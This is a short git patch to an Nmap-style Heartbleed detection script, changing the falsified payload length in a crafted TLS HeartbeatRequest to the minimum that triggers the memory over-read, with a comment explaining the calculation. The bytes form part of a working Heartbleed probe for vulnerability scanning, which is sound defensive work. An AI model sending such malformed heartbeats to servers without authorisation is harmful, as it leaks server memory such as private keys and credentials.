From e38d9618a39b7c290f8328a17d38faa053385c0e Mon Sep 17 00:00:00 2001 From: dmiller Date: Wed, 9 Apr 2014 15:58:09 +0000 Subject: [PATCH] Adjust heartbleed payload size to minimum required to trigger --- scripts/ssl-heartbleed.nse | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scripts/ssl-heartbleed.nse b/scripts/ssl-heartbleed.nse index ccbffbf5a..0e73351fc 100644 --- a/scripts/ssl-heartbleed.nse +++ b/scripts/ssl-heartbleed.nse @@ -164,7 +164,8 @@ OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1 "03 02", -- TLSv1.1 "00 03", -- record length "01", -- HeartbeatType HeartbeatRequest - "40 00", -- payload length (falsified) + "0f e9", -- payload length (falsified) + -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet header + 1 to overflow }) )